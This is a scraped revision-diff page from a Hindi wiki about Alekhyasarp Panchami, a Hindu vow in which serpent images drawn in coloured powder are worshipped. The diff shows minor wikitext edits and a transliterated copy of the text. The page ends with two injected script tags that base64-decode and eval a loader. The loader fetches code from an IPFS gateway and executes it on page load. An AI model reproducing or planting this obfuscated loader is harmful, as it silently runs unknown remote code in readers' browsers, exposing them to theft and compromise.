Difference between revisions of "आलेख्यसर्प पंचमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*आलेख्यसर्प पंचमी व्रत [[भाद्रपद]] [[शुक्ल पक्ष]] की [[पंचमी]] को किया जाता है।
 
*आलेख्यसर्प पंचमी व्रत [[भाद्रपद]] [[शुक्ल पक्ष]] की [[पंचमी]] को किया जाता है।
 
*आलेख्यसर्प पंचमी तिथि-व्रत में रंगीन चूर्ण से [[नाग|नागों]] के चित्र खींचकर उनकी पूजा की जाती है।
 
*आलेख्यसर्प पंचमी तिथि-व्रत में रंगीन चूर्ण से [[नाग|नागों]] के चित्र खींचकर उनकी पूजा की जाती है।
*आलेख्यसर्पपंचमी के व्रत से नागों का भय दूर हो जाता है।<ref>भविष्योत्तरपुराण (ब्राह्मवर्व 37|1-3); कृत्यकल्पतरु (व्रत 94-95); हेमाद्रि व्रतखण्ड (1, 567)</ref>
+
*आलेख्यसर्पपंचमी के व्रत से नागों का भय दूर हो जाता है।<ref>भविष्योत्तरपुराण (ब्राह्मवर्व 37|1-3); कृत्यकल्पतरु (व्रत 94-95); हेमाद्रि व्रतखण्ड (1, 567</ref>
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:40, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • alekhyasarp panchami vrat bhadrapad shukl paksh ki panchami ko kiya jata hai.
  • alekhyasarp panchami tithi-vrat mean rangin choorn se nagoan ke chitr khianchakar unaki pooja ki jati hai.
  • alekhyasarpapanchami ke vrat se nagoan ka bhay door ho jata hai.[1]


tika tippani aur sandarbh

  1. bhavishyottarapuran (brahmavarv 37|1-3); krityakalpataru (vrat 94-95); hemadri vratakhand (1, 567

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>